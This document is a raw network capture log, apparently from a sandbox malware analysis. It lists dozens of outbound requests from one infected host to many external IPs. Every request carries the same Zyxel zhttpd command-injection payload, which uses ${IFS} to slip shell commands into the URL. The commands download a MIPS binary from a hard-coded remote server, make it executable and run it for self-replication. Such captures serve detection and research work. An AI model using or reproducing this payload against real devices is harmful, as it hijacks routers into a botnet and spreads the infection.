                                          Jan 14, 2024 15:46:14.966676950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4014192.168.2.235722650.236.39.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966712952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4015192.168.2.2347986155.33.224.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966758013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4016192.168.2.235868073.13.247.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966792107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4017192.168.2.2345400176.128.123.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966861010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4018192.168.2.234027838.7.180.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966892004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4019192.168.2.2360662131.202.213.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966900110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4020192.168.2.234943450.170.211.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966949940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4021192.168.2.234167667.85.35.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.966972113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4022192.168.2.234027625.47.253.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967031956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4023192.168.2.2356572197.238.199.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967044115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4024192.168.2.2350062139.77.250.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967058897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4025192.168.2.233470074.172.123.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967125893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4026192.168.2.234050037.154.27.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967159986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4027192.168.2.234057078.208.111.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967180967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4028192.168.2.2352828172.93.115.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967237949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4029192.168.2.234474037.152.68.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967294931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4030192.168.2.235174876.234.53.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967307091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4031192.168.2.2343004221.171.62.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967344999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4032192.168.2.2356746137.134.197.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967365026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4033192.168.2.235321853.9.93.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967397928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4034192.168.2.234261659.218.91.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967447996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4035192.168.2.2343622152.52.33.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967468977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4036192.168.2.2360194185.169.180.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967514992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4037192.168.2.2336782222.75.79.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967540026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4038192.168.2.2356182189.3.45.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967562914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4039192.168.2.2356910133.202.252.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967627048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4040192.168.2.2333278200.113.142.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967664003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4041192.168.2.235942058.196.141.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967724085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4042192.168.2.2346088196.211.120.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967752934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4043192.168.2.234198212.192.47.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967772961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4044192.168.2.2352474130.139.98.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967808008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4045192.168.2.234811444.6.121.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967845917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4046192.168.2.2347658112.243.240.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967879057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4047192.168.2.2352348129.254.196.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967905998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4048192.168.2.2357698205.195.79.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967932940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4049192.168.2.233854884.248.239.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.967989922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4050192.168.2.2357152204.27.188.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968013048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4051192.168.2.235195297.234.174.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968064070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4052192.168.2.234034670.52.191.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968099117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4053192.168.2.2352112165.129.46.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968146086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4054192.168.2.2340138108.122.35.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968169928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4055192.168.2.2351288121.86.218.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968183994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4056192.168.2.2335772132.219.43.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968238115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4057192.168.2.2343378193.131.60.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968297958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4058192.168.2.233975631.15.63.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968357086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4059192.168.2.2344384142.217.170.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968394995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4060192.168.2.2338192163.137.58.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968446970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4061192.168.2.2354054147.248.35.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968488932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4062192.168.2.233556413.51.60.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968523979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4063192.168.2.235083636.10.99.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968537092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4064192.168.2.234487070.192.155.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968555927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4065192.168.2.233381492.18.60.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968622923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4066192.168.2.2359160154.152.233.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968655109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4067192.168.2.2357514192.80.148.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968667984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4068192.168.2.2333004136.223.121.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968693972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4069192.168.2.234176269.124.228.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968728065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4070192.168.2.234716645.67.255.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968791008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4071192.168.2.233598484.230.116.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968801022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4072192.168.2.23592102.117.69.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968863010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4073192.168.2.234449473.41.114.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968897104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4074192.168.2.2337796172.254.160.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968925953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4075192.168.2.233501072.84.144.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.968941927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4076192.168.2.234629039.182.198.62443
                                          TimestampBytes transferredDirectionData
